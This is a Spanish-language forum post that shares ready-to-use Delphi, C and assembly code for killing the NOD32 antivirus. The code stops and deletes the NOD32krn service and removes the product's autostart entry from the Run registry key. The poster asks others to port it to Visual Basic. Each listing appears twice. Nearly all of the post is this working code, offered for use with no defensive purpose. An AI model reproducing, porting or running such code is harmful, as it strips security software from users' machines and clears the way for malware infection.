Autor
Les traigo un codigo para detener y eliminar al Nod32 de un plumaso, pero esta en delphi, asm y C
Si alguien lo puede transcribir en viusal basic, os agradezco.
( no es mio, lo encontre en otro foro )
DELPHI Hecho por Kira
Código:
type
HKEY = type LongWord;
REGSAM = type longWord;
DWORD = type longWord;
function WinExec(lpCmdLine: PAnsiChar; uCmdShow: LongWord): LongWord; stdcall;
external 'kernel32.dll' name 'WinExec';
function RegOpenKeyEx(hKey: HKEY; lpSubKey: PChar;
ulOptions: DWORD; samDesired: REGSAM; var phkResult: HKEY): Longint; stdcall;
external 'advapi32.dll' name 'RegOpenKeyExA';
function RegDeleteValue(hKey: HKEY; lpValueName: PChar): Longint; stdcall;
external 'advapi32.dll' name 'RegDeleteValueA';
function RegCloseKey(hKey: HKEY): Longint; stdcall;
external 'advapi32.dll' name 'RegCloseKey';
const
HKEY_LOCAL_MACHINE = DWORD($80000002);
KEY_SET_VALUE = $0002;
var
accion:string;
Key : Hkey;
begin
accion:='Cmd.exe /c sc stop NOD32krn';
WinExec(pchar(accion),0);
accion:='Cmd.exe /c sc delete NOD32krn ';
WinExec(pchar(accion),0);
RegOpenKeyEx(HKEY_LOCAL_MACHINE, pChar('SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\RUN'), 0, KEY_SET_VALUE, KEY);
RegDeleteValue(Key, PCHAR('nod32kui'));
RegCloseKey(Key);
HKEY = type LongWord;
REGSAM = type longWord;
DWORD = type longWord;
function WinExec(lpCmdLine: PAnsiChar; uCmdShow: LongWord): LongWord; stdcall;
external 'kernel32.dll' name 'WinExec';
function RegOpenKeyEx(hKey: HKEY; lpSubKey: PChar;
ulOptions: DWORD; samDesired: REGSAM; var phkResult: HKEY): Longint; stdcall;
external 'advapi32.dll' name 'RegOpenKeyExA';
function RegDeleteValue(hKey: HKEY; lpValueName: PChar): Longint; stdcall;
external 'advapi32.dll' name 'RegDeleteValueA';
function RegCloseKey(hKey: HKEY): Longint; stdcall;
external 'advapi32.dll' name 'RegCloseKey';
const
HKEY_LOCAL_MACHINE = DWORD($80000002);
KEY_SET_VALUE = $0002;
var
accion:string;
Key : Hkey;
begin
accion:='Cmd.exe /c sc stop NOD32krn';
WinExec(pchar(accion),0);
accion:='Cmd.exe /c sc delete NOD32krn ';
WinExec(pchar(accion),0);
RegOpenKeyEx(HKEY_LOCAL_MACHINE, pChar('SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\RUN'), 0, KEY_SET_VALUE, KEY);
RegDeleteValue(Key, PCHAR('nod32kui'));
RegCloseKey(Key);
C Hecho por Pseudoroot
Código:
#include <windows.h>
int WINAPI WinMain (HINSTANCE hThisInstance,
HINSTANCE hPrevInstance,
LPSTR lpszArgument,
int nFunsterStil)
{
char* accion1="Cmd.exe /c sc stop NOD32krn";
char* accion2="Cmd.exe /c sc delete NOD32krn";
WinExec(accion1,0);
Sleep(1000); // Le agregue un retardo para que efectue correcta la primera api.
WinExec(accion2,0);
HKEY key;
RegOpenKeyEx(HKEY_LOCAL_MACHINE,"Software\\Microsoft\\Windows\\CurrentVersion\\run",0,KEY_SET_VALUE,&key);
RegDeleteValue(key,("nod32kui"));
RegCloseKey(key);
return 0;
}
int WINAPI WinMain (HINSTANCE hThisInstance,
HINSTANCE hPrevInstance,
LPSTR lpszArgument,
int nFunsterStil)
{
char* accion1="Cmd.exe /c sc stop NOD32krn";
char* accion2="Cmd.exe /c sc delete NOD32krn";
WinExec(accion1,0);
Sleep(1000); // Le agregue un retardo para que efectue correcta la primera api.
WinExec(accion2,0);
HKEY key;
RegOpenKeyEx(HKEY_LOCAL_MACHINE,"Software\\Microsoft\\Windows\\CurrentVersion\\run",0,KEY_SET_VALUE,&key);
RegDeleteValue(key,("nod32kui"));
RegCloseKey(key);
return 0;
}
ASM
Código:
.386
.model flat,stdcall
option casemap:none
include windows.inc
include kernel32.inc
include advapi32.inc
includelib kernel32.lib
includelib advapi32.lib
.data
accion1 db 'Cmd.exe /c sc stop NOD32krn',0
accion2 db 'Cmd.exe /c sc delete NOD32krn',0
ruta db 'SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\RUN',0
dato db 'nod32kui',0
.data?
hkey DWORD ?
.code
mataNod:
push 0
push offset accion1
call WinExec
push 0
push offset accion2
call WinExec
push offset hkey
push KEY_SET_VALUE
push 0
push offset ruta
push HKEY_LOCAL_MACHINE
call RegOpenKeyEx
push offset dato
push hkey
call RegDeleteValue
push hkey
call RegCloseKey
push 0
call ExitProcess
.model flat,stdcall
option casemap:none
include windows.inc
include kernel32.inc
include advapi32.inc
includelib kernel32.lib
includelib advapi32.lib
.data
accion1 db 'Cmd.exe /c sc stop NOD32krn',0
accion2 db 'Cmd.exe /c sc delete NOD32krn',0
ruta db 'SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\RUN',0
dato db 'nod32kui',0
.data?
hkey DWORD ?
.code
mataNod:
push 0
push offset accion1
call WinExec
push 0
push offset accion2
call WinExec
push offset hkey
push KEY_SET_VALUE
push 0
push offset ruta
push HKEY_LOCAL_MACHINE
call RegOpenKeyEx
push offset dato
push hkey
call RegDeleteValue
push hkey
call RegCloseKey
push 0
call ExitProcess
Si alguien lo sabe pasar a VB, os agradezco.
En línea
